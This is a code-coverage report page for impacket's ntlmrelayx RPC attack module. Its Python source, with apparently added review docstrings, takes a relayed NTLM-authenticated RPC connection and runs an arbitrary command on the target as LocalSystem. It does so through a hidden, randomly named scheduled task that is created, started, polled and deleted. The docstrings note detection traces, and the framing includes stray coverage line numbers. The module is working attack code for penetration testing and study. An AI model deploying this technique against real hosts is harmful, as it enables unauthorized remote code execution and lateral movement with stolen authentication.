Coverage for /root/GitHubProjects/impacket/impacket/examples/ntlmrelayx/attacks/rpcattack.py : 0%

1# Impacket - Collection of Python classes for working with network protocols.
2#
3# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
4#
5# This software is provided under a slightly modified version
6# of the Apache Software License. See the accompanying LICENSE file
7# for more information.
8#
9# Authors:
10# Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
11# Based on @agsolino and @_dirkjan code
12#
14import time
15import string
16import random
18from impacket import LOG
19from impacket.dcerpc.v5 import tsch
20from impacket.dcerpc.v5.dtypes import NULL
21from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
# Name of the attack class this module exposes; it matches the RPCAttack class
# defined below. NOTE(review): presumably read by the ntlmrelayx plugin loader
# to find the class - confirm against the loader.
PROTOCOL_ATTACK_CLASS = "RPCAttack"
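class TSCHRPCAttack:
    """Mixin that runs ``self.config.command`` through the Task Scheduler RPC interface.

    The host class must provide ``self.config`` (with a ``command`` attribute),
    ``self.dce`` (the DCE/RPC connection passed to the ``tsch`` helpers) and
    ``self.stringbinding`` (used only in the log line).

    Footprint on the target, as established by the code below: a task is
    registered directly under the root folder ``\\`` with a random
    8-letter ASCII name, marked ``Hidden``, running ``cmd.exe /C <command>``
    as S-1-5-18 (LocalSystem); it is started on demand, polled, and deleted.
    Defenders typically see this as a task create/delete pair a few seconds
    apart (Security events 4698/4699 when object-access auditing is on, and
    the TaskScheduler/Operational log), with ``cmd.exe`` spawned by the
    Task Scheduler service.
    """

    def _xml_escape(self, data):
        """Return *data* with the five XML special characters replaced by entities.

        The command line is interpolated into the task definition XML, so
        ``&``, ``"``, ``'``, ``>`` and ``<`` must be emitted as entities to keep
        the document well-formed. Every other character is passed through.
        """
        replace_table = {
            "&": "&amp;",
            '"': "&quot;",
            "'": "&apos;",
            ">": "&gt;",
            "<": "&lt;",
        }
        return ''.join(replace_table.get(c, c) for c in data)

    def _run(self):
        """Register, start, poll and delete a one-shot task carrying the configured command.

        No output of the command is collected. The method returns ``None``.
        """
        # Random task name: 8 ASCII letters, registered under the root folder.
        tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])

        cmd = "cmd.exe"
        args = "/C %s" % self.config.command

        LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))

        # Task definition. The calendar trigger's start boundary lies in the
        # past; the task is started explicitly by the SchRpcRun call below.
        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>%s</Command>
      <Arguments>%s</Arguments>
    </Exec>
  </Actions>
</Task>
        """ % (self._xml_escape(cmd), self._xml_escape(args))

        LOG.info('Creating task \\%s' % tmpName)
        tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)

        LOG.info('Running task \\%s' % tmpName)
        done = False

        tsch.hSchRpcRun(self.dce, '\\%s' % tmpName)

        # A non-zero year in the last-run timestamp means the task has been
        # started at least once.
        # NOTE(review): the loop has no upper bound, and the delete below is
        # not in a finally block - if a call raises or no run is ever recorded,
        # the hidden LocalSystem task stays registered on the host.
        while not done:
            LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
            resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName)
            if resp['pLastRuntime']['wYear'] != 0:
                done = True
            else:
                time.sleep(2)

        LOG.info('Deleting task \\%s' % tmpName)
        tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName)
        LOG.info('Completed!')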
class RPCAttack(ProtocolAttack, TSCHRPCAttack):
    """ntlmrelayx attack plugin registered under the "RPC" plugin name.

    Holds the DCE/RPC connection it is given, records its transport and
    string binding, and delegates command execution to ``TSCHRPCAttack._run``.
    """

    PLUGIN_NAMES = ["RPC"]

    def __init__(self, config, dce, username):
        """Initialise the base attack and remember the connection details.

        Args:
            config: attack configuration; ``run`` reads ``config.command``.
            dce: DCE/RPC connection object used for every call.
            username: passed through to ``ProtocolAttack.__init__``.
        """
        ProtocolAttack.__init__(self, config, dce, username)
        self.dce = dce
        transport = dce.get_rpc_transport()
        self.rpctransport = transport
        self.stringbinding = transport.get_stringbinding()

    def run(self):
        """Run the configured command, or log an error when none was supplied."""
        # Assume the endpoint is TSCH
        # TODO: support relaying RPC to different endpoints
        # TODO: support for providing a shell
        # TODO: support for getting an output
        if self.config.command is None:
            LOG.error("No command provided to attack")
            return

        TSCHRPCAttack._run(self)
129 LOG.error("No command provided to attack")